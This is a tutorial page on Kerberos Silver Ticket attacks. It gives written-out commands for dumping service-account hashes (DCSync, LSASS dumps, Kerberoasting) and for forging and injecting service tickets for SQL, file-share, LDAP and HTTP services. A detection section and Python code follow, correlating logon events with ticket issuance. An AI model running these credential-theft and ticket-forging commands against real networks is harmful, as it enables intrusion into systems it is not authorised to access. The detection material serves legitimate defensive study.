Objectives

What is a Silver Ticket?

A Silver Ticket is a forged Service Ticket (ST) that lets an attacker authenticate to a specific service without ever contacting the Key Distribution Center (KDC): because an ST is encrypted with the service account's key, anyone holding that key can build one offline and present it straight to the service.

Silver Ticket Characteristics:

  • Service-specific: forged for one SPN on one host
  • No TGT required: the ticket is built from the service account's key and presented directly to the service, so the KDC is never involved
  • Limited scope: only the targeted service accepts it
  • Stealthier: no ticket-request events are written on the domain controllers, so it is less detectable than a Golden Ticket

Golden Ticket vs Silver Ticket

Characteristic     Golden Ticket            Silver Ticket
Target             Domain-wide access       Specific service
Required Hash      KRBTGT                   Service account
Ticket Type        TGT                      ST
KDC Interaction    Required for new STs     Not required
Detection          More detectable          Less detectable

Prerequisites for Silver Ticket Attack

To create a Silver Ticket, an attacker needs:

1. Service Account Hash

The password hash of the account the target service runs under. For services the operating system itself hosts, such as CIFS on a file server, that account is the machine's computer account.

Common Service Accounts:

2. Service Principal Name (SPN)

The SPN uniquely identifies a service instance in the domain.

# SPN format: service_class/hostname[:port][/service_name]
# Examples:
MSSQLSvc/dbserver.corp.local:1433
HTTP/webserver.corp.local:80
CIFS/fileserver.corp.local:445
LDAP/dc.corp.local:389

3. Target Service Information

Information about the target service including hostname and port.

Service Account Hash Extraction

Method 1: DCSync Attack

Extract service account hashes using DCSync:

# Using Mimikatz
mimikatz # lsadump::dcsync /domain:corp.local /user:mssql_service

# Using Impacket
secretsdump.py -dc-ip 192.168.1.10 corp.local/compromised_user:password@192.168.1.10

# Using Rubeus
Rubeus.exe dcsync /user:mssql_service /domain:corp.local

Method 2: LSASS Memory Dump

Extract hashes from LSASS memory on the service host:

# Using Mimikatz on target system
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets /export

# Using ProcDump + Mimikatz
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmp

Method 3: Kerberoasting

Request service tickets and crack them offline:

# Using Rubeus
Rubeus.exe kerberoast /user:mssql_service /format:hashcat

# Using Impacket
GetUserSPNs.py -request corp.local/user:password -dc-ip 192.168.1.10

Silver Ticket Creation Process

Step 1: Identify Target Service

Enumerate services and their SPNs:

# Using PowerView
Get-NetUser -SPN | Where-Object {$_.serviceprincipalname -like "*MSSQL*"}

# Using PowerShell
Get-ADUser -Filter "ServicePrincipalName -like '*MSSQL*'" -Properties ServicePrincipalName

# Using setspn.exe
setspn.exe -Q */*
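The SPN format given under the prerequisites and the Step 1 enumeration both reduce to parsing service_class/host[:port][/service_name] strings and grouping them by the account that holds them. The following Python is an added example, not code from the page: it parses SPNs (including SQL named instances and the optional third component), finds the accounts behind one service class the way the "*MSSQL*" search above does but with an exact class match, and answers the question a defender asks when reading the prerequisites, namely which hosts become reachable if one service account's key leaks. SAMPLE_SPNS is constructed sample data in the page's corp.local naming, shaped like Get-ADUser -Properties ServicePrincipalName output; the account names are assumptions.

```python
"""Parse Service Principal Names and map service accounts to the hosts they expose.

Added example, not code from the original page. SAMPLE_SPNS is a constructed
sample in the page's corp.local naming; in practice the same dictionary would
be built from Get-ADUser -Properties ServicePrincipalName or setspn -Q */* output.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class SPN:
    service_class: str           # MSSQLSvc, HTTP, CIFS, LDAP, HOST, ...
    host: str                    # service host, lower-cased for matching
    port: Optional[int]          # numeric port, e.g. 1433
    instance: Optional[str]      # non-numeric suffix, e.g. a SQL named instance
    service_name: Optional[str]  # optional third component, e.g. LDAP/dc/corp.local


def parse_spn(spn: str) -> SPN:
    """Split service_class/host[:port_or_instance][/service_name] into parts.

    Raises ValueError for strings that are not well-formed SPNs; malformed
    SPNs in the directory are themselves worth reviewing.
    """
    parts = spn.strip().split("/")
    if not 2 <= len(parts) <= 3 or not parts[0] or not parts[1]:
        raise ValueError(f"not a valid SPN: {spn!r}")
    service_class, host_part = parts[0], parts[1]
    service_name = parts[2] if len(parts) == 3 and parts[2] else None
    port: Optional[int] = None
    instance: Optional[str] = None
    if ":" in host_part:
        host, suffix = host_part.rsplit(":", 1)
        if suffix.isdigit():
            port = int(suffix)
        else:
            instance = suffix          # e.g. MSSQLSvc/host:SQLEXPRESS
    else:
        host = host_part
    if not host:
        raise ValueError(f"SPN has no host: {spn!r}")
    return SPN(service_class, host.lower(), port, instance, service_name)


def accounts_for_service_class(spn_map: Dict[str, List[str]], service_class: str) -> Dict[str, List[SPN]]:
    """Accounts holding SPNs of one service class (the Step 1 '*MSSQL*' search,
    but matched exactly and case-insensitively, so MSSQLServer is not confused
    with MSSQLSvc)."""
    wanted = service_class.lower()
    found: Dict[str, List[SPN]] = {}
    for account, spns in spn_map.items():
        hits = [p for p in map(parse_spn, spns) if p.service_class.lower() == wanted]
        if hits:
            found[account] = hits
    return found


def hosts_exposed_by(spn_map: Dict[str, List[str]], account: str) -> List[Tuple[str, str]]:
    """(service_class, host) pairs a forged ST could reach if this account's
    key leaked: every SPN the account holds, not only the one that was noticed."""
    pairs = {(p.service_class.lower(), p.host) for p in map(parse_spn, spn_map.get(account, []))}
    return sorted(pairs)


SAMPLE_SPNS: Dict[str, List[str]] = {   # constructed sample data
    "mssql_service": ["MSSQLSvc/dbserver.corp.local:1433",
                      "MSSQLSvc/dbserver.corp.local:SQLEXPRESS",
                      "MSSQLSvc/sql2.corp.local:1433"],
    "web_service": ["HTTP/webserver.corp.local", "HTTP/webserver.corp.local:80"],
    "DC01$": ["LDAP/dc.corp.local/corp.local", "CIFS/dc.corp.local", "HOST/dc.corp.local"],
    "svc_legacy": ["MSSQLServer/legacy.corp.local:1433"],
}

if __name__ == "__main__":
    for account, spns in accounts_for_service_class(SAMPLE_SPNS, "MSSQLSvc").items():
        print(account, [f"{s.host}:{s.port or s.instance}" for s in spns])
    print("exposed by mssql_service:", hosts_exposed_by(SAMPLE_SPNS, "mssql_service"))
```

hosts_exposed_by is the number that matters when a service account's hash is found in a DCSync, LSASS dump or cracked Kerberoast hash: every host in that list needs its tickets treated as untrusted until the account's password (and so its key) is changed.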

Step 2: Create Silver Ticket

Create the Silver Ticket using the service account hash:

# Using Mimikatz for SQL Server
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:dbserver.corp.local:1433 /service:MSSQLSvc /rc4:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef /user:administrator /id:500 /groups:512,513,518,519,520 /ticket:sql_silver.kirbi

# Using Mimikatz for CIFS
mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:fileserver.corp.local /service:cifs /rc4:hash /user:administrator /ticket:cifs_silver.kirbi

# Using Rubeus
Rubeus.exe silver /rc4:hash /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:dbserver.corp.local /service:MSSQLSvc /user:administrator /groups:512,513,518,519,520

Step 3: Inject Silver Ticket

Inject the Silver Ticket into memory:

# Using Mimikatz
mimikatz # kerberos::ptt sql_silver.kirbi

# Using Rubeus
Rubeus.exe ptt /ticket:sql_silver.kirbi

# Verify ticket injection
klist

Service-Specific Silver Tickets

SQL Server Silver Tickets

Create Silver Tickets for SQL Server access:

# SQL Server Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:dbserver.corp.local:1433 /service:MSSQLSvc /rc4:sql_service_hash /user:administrator /ticket:sql_silver.kirbi

# Access SQL Server
sqlcmd -S dbserver.corp.local -E

File Share Silver Tickets

Create Silver Tickets for file share access:

# CIFS Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:fileserver.corp.local /service:cifs /rc4:cifs_service_hash /user:administrator /ticket:cifs_silver.kirbi

# Access file share
dir \\fileserver.corp.local\share

LDAP Silver Tickets

Create Silver Tickets for LDAP access:

# LDAP Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:dc.corp.local /service:ldap /rc4:ldap_service_hash /user:administrator /ticket:ldap_silver.kirbi

# Query LDAP
ldapsearch -H ldap://dc.corp.local -D "CN=administrator,CN=Users,DC=corp,DC=local" -W -b "DC=corp,DC=local"

HTTP Silver Tickets

Create Silver Tickets for web service access:

# HTTP Silver Ticket
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:webserver.corp.local /service:http /rc4:http_service_hash /user:administrator /ticket:http_silver.kirbi

# Access web service
curl -k https://webserver.corp.local/admin

Advanced Silver Ticket Techniques

1. Custom PAC for Service Access

Create Silver Tickets with specific privileges:

# Silver Ticket with custom SIDs
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:service.corp.local /service:service_type /rc4:hash /user:service_user /id:1001 /groups:512 /sids:S-1-5-21-1234567890-1234567890-1234567890-519

2. Cross-Domain Silver Tickets

Create Silver Tickets for trusted domain services:

# Silver Ticket for trusted domain
mimikatz # kerberos::golden /domain:trusted.local /sid:trusted_sid /target:service.trusted.local /service:service_type /rc4:trusted_hash /user:administrator /ticket:trusted_silver.kirbi

3. Multiple Service Silver Tickets

Create Silver Tickets for multiple related services:

# Create tickets for multiple SQL instances
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:sql1.corp.local:1433 /service:MSSQLSvc /rc4:hash /user:admin /ticket:sql1.kirbi
mimikatz # kerberos::golden /domain:corp.local /sid:domain_sid /target:sql2.corp.local:1433 /service:MSSQLSvc /rc4:hash /user:admin /ticket:sql2.kirbi

Silver Ticket Detection

Because a forged ST is never issued by the KDC, the domain controllers record no ticket request for it; everything the attack leaves behind lands on the service host. Detecting Silver Ticket attacks therefore requires collecting the service hosts' logon events and correlating them with ticket issuance on the domain controllers, and, where the service supports it, enabling PAC validation so the host checks the ticket's PAC signature with a domain controller instead of trusting it.

Detection Indicators

Monitoring Commands

# Service ticket requests recorded on the domain controllers (event 4769).
# A forged ST never produces one, so this is the baseline of legitimate
# issuance to correlate against, not the alert itself.
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -match "MSSQLSvc"}

# Network logons on the service host itself (event 4624). A Kerberos network
# logon here with no matching 4769 on any domain controller is the Silver Ticket signal.
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match 'Logon Type:\s+3' -and $_.Message -match 'Authentication Package:\s+Kerberos'}
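The correlation the monitoring commands point at, as an added Python example that is not part of the original page: 4769 records collected from the domain controllers are matched against 4624 Kerberos network logons collected from the service hosts, and a logon with no successful issuance for the same user and service account within one ticket lifetime is flagged. Every event record, the host-to-service-account map and the corp.local names are constructed assumptions. It also evaluates two supporting indicators: RC4 (0x17) service tickets requested for user service accounts, which is the request shape of the Kerberoasting hash source in Method 3, and a DNS-style Account Domain field in 4624, which has been reported for tickets built by forging tools.

```python
"""Correlate service-host Kerberos logons with ticket issuance on the DCs.

Added example, not code from the original page. Every record below is a
constructed sample with the fields of Windows Security events 4769 (domain
controller) and 4624 (service host); hosts, accounts and addresses follow
the page's corp.local naming and the host-to-service-account map is assumed.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Which service account's key protects tickets presented to each host.
# Assumption: derived from the hosts' SPNs; file/host services on a member
# server are keyed by its computer account.
HOST_TO_SERVICE_ACCOUNT: Dict[str, str] = {
    "dbserver.corp.local": "mssql_service",
    "fileserver.corp.local": "FILESERVER$",
}
NETBIOS_DOMAIN = "CORP"                      # short domain name expected in 4624
MAX_TICKET_LIFETIME = timedelta(hours=10)    # default service ticket lifetime

DC_EVENTS: List[dict] = [   # 4769 on the domain controllers, constructed
    {"id": 4769, "time": "2024-05-01T09:00:05", "account": "alice@CORP.LOCAL",
     "service": "mssql_service", "client_ip": "192.168.1.50", "enc_type": "0x12", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:20:00", "account": "bob@CORP.LOCAL",
     "service": "mssql_service", "client_ip": "192.168.1.77", "enc_type": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:30:00", "account": "carol@CORP.LOCAL",
     "service": "FILESERVER$", "client_ip": "192.168.1.60", "enc_type": "0x12", "status": "0x0"},
]

HOST_EVENTS: List[dict] = [  # 4624 from the service hosts, constructed
    {"id": 4624, "time": "2024-05-01T09:00:06", "host": "dbserver.corp.local", "account": "alice",
     "domain": "CORP", "logon_type": 3, "auth_package": "Kerberos", "source_ip": "192.168.1.50"},
    {"id": 4624, "time": "2024-05-01T14:45:00", "host": "dbserver.corp.local", "account": "administrator",
     "domain": "corp.local", "logon_type": 3, "auth_package": "Kerberos", "source_ip": "192.168.1.77"},
    {"id": 4624, "time": "2024-05-01T09:31:00", "host": "fileserver.corp.local", "account": "carol",
     "domain": "CORP", "logon_type": 3, "auth_package": "Kerberos", "source_ip": "192.168.1.60"},
    {"id": 4624, "time": "2024-05-01T10:00:00", "host": "fileserver.corp.local", "account": "dave",
     "domain": "CORP", "logon_type": 3, "auth_package": "NTLM", "source_ip": "192.168.1.61"},
]


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def unissued_kerberos_logons(host_events: List[dict], dc_events: List[dict],
                             host_map: Dict[str, str] = HOST_TO_SERVICE_ACCOUNT,
                             lifetime: timedelta = MAX_TICKET_LIFETIME) -> List[dict]:
    """Kerberos network logons (4624, type 3) with no successful 4769 for the
    same user and service account issued at most one ticket lifetime earlier.
    A genuine ST always has such an issuance; a forged one never does."""
    issued = [e for e in dc_events if e["id"] == 4769 and e["status"] == "0x0"]
    flagged = []
    for ev in host_events:
        if ev["id"] != 4624 or ev["logon_type"] != 3 or ev["auth_package"].lower() != "kerberos":
            continue                                  # NTLM and local logons involve no ticket
        service = host_map.get(ev["host"].lower())
        if service is None:
            continue                                  # unmapped host: extend the map first
        logon_at = _ts(ev["time"])
        matched = any(
            e["service"].lower() == service.lower()
            and e["account"].split("@", 1)[0].lower() == ev["account"].lower()
            and timedelta(0) <= logon_at - _ts(e["time"]) <= lifetime
            for e in issued
        )
        if not matched:
            flagged.append(ev)
    return flagged


def rc4_tickets_for_user_accounts(dc_events: List[dict]) -> List[dict]:
    """4769 with RC4-HMAC (0x17) for a service account that is a user, not a
    computer ($): the request shape of Kerberoasting (Method 3 above)."""
    return [e for e in dc_events
            if e["id"] == 4769 and e["enc_type"].lower() == "0x17" and not e["service"].endswith("$")]


def dns_style_domain_field(host_events: List[dict], netbios: str = NETBIOS_DOMAIN) -> List[dict]:
    """4624 whose Account Domain is the DNS name instead of the NetBIOS name.
    Reported for tickets built by forging tools; supporting evidence only."""
    return [e for e in host_events if e["id"] == 4624 and e["domain"].upper() != netbios.upper()]


if __name__ == "__main__":
    for ev in unissued_kerberos_logons(HOST_EVENTS, DC_EVENTS):
        print("no KDC issuance:", ev["host"], ev["account"], ev["source_ip"])
    for ev in rc4_tickets_for_user_accounts(DC_EVENTS):
        print("RC4 ST for user SPN:", ev["service"], "requested by", ev["account"])
    for ev in dns_style_domain_field(HOST_EVENTS):
        print("DNS-style domain field:", ev["host"], ev["account"], ev["domain"])
```

The correlation only holds if 4769 is collected from every domain controller the clients can reach, and the window must cover the domain's maximum service ticket lifetime, since a legitimate cached ticket may be presented hours after it was issued. Hosts missing from the map are skipped rather than alerted on, so the map has to be kept in step with the SPN inventory.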